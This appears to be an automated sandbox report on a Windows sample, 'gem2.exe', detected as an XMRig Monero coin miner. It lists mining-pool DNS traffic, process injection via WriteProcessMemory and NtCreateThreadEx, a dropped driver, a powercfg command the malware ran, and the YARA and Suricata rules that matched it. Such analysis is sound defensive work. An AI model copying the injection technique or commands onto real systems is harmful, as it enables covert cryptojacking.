          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE86DCE0 FindFirstFileExW,36_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CDCE0 FindFirstFileExW,40_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBEDCE0 FindFirstFileExW,41_2_000001160CBEDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10ADCE0 FindFirstFileExW,66_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93DCE0 FindFirstFileExW,67_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854DCE0 FindFirstFileExW,68_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531DCE0 FindFirstFileExW,69_2_000001D26531DCE0
          Source: global trafficTCP traffic: 192.168.2.5:50294 -> 1.1.1.1:53
          Source: global trafficTCP traffic: 192.168.2.5:56302 -> 162.159.36.2:53
          Source: Joe Sandbox ViewIP Address: 141.94.96.144 141.94.96.144
          Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
          Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:60174 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.144:80
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: lsass.exe, 00000024.00000002.3311887155.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
          Source: lsass.exe, 00000024.00000002.3311409075.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
          Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000024.00000002.3311409075.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000024.00000002.3310424215.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000024.00000002.3310424215.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311409075.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 7720, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B1394 NtFlushKey,0_2_00007FF72A7B1394
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,23_2_00000001400010C0
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey,29_2_000001E8589828C8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,36_2_00000140AE86202C
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,36_2_00000140AE86253C
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D81394 NtSetWnfProcessNotificationEvent,37_2_00007FF6E4D81394
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBE28C8 NtEnumerateValueKey,NtEnumerateValueKey,41_2_000001160CBE28C8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 NtQueryValueKey,64_2_0000000140001394
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\TEMP\yycjbdwxjaoe.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_dmcpz4ps.vdx.ps1
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B65EC0_2_00007FF72A7B65EC
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B65EC0_2_00007FF72A7B65EC
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B65EC0_2_00007FF72A7B65EC
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B65EC0_2_00007FF72A7B65EC
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_000000014000226C23_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_00000001400014D823_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_000000014000256023_2_0000000140002560
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E858951F2C29_2_000001E858951F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589638A829_2_000001E8589638A8
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85895D0E029_2_000001E85895D0E0
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E858982B2C29_2_000001E858982B2C
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589944A829_2_000001E8589944A8
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85898DCE029_2_000001E85898DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589B1F2C29_2_000001E8589B1F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589C38A829_2_000001E8589C38A8
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589BD0E029_2_000001E8589BD0E0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140ADFC1F2C36_2_00000140ADFC1F2C
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140ADFCD0E036_2_00000140ADFCD0E0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140ADFD38A836_2_00000140ADFD38A8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE86DCE036_2_00000140AE86DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE8744A836_2_00000140AE8744A8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE862B2C36_2_00000140AE862B2C
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D865EC37_2_00007FF6E4D865EC
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D865EC37_2_00007FF6E4D865EC
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D865EC37_2_00007FF6E4D865EC
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D865EC37_2_00007FF6E4D865EC
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD59D0E040_2_00000195DD59D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5A38A840_2_00000195DD5A38A8
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD591F2C40_2_00000195DD591F2C
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CDCE040_2_00000195DD5CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5D44A840_2_00000195DD5D44A8
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5C2B2C40_2_00000195DD5C2B2C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBB1F2C41_2_000001160CBB1F2C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBBD0E041_2_000001160CBBD0E0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBC38A841_2_000001160CBC38A8
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBE2B2C41_2_000001160CBE2B2C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBEDCE041_2_000001160CBEDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBF44A841_2_000001160CBF44A8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_00000001400014D862_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000256062_2_0000000140002560
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_000000014000315064_2_0000000140003150
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001400026E064_2_00000001400026E0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10838A866_2_00000257E10838A8
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E107D0E066_2_00000257E107D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E1071F2C66_2_00000257E1071F2C
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10B44A866_2_00000257E10B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10ADCE066_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10A2B2C66_2_00000257E10A2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1E38A867_2_000001F28C1E38A8
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1DD0E067_2_000001F28C1DD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1D1F2C67_2_000001F28C1D1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C9444A867_2_000001F28C9444A8
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93DCE067_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C932B2C67_2_000001F28C932B2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FD1F2C68_2_000001CA97FD1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FDD0E068_2_000001CA97FDD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FE38A868_2_000001CA97FE38A8
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA98542B2C68_2_000001CA98542B2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854DCE068_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA985544A868_2_000001CA985544A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652F38A869_2_000001D2652F38A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652ED0E069_2_000001D2652ED0E0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652E1F2C69_2_000001D2652E1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2653244A869_2_000001D2653244A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531DCE069_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26532AEC269_2_000001D26532AEC2
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D265312B2C69_2_000001D265312B2C
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\yycjbdwxjaoe.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Users\user\Desktop\gem2.exeCode function: String function: 00007FF72A7B1394 appears 33 times
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: String function: 00007FF6E4D81394 appears 33 times
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
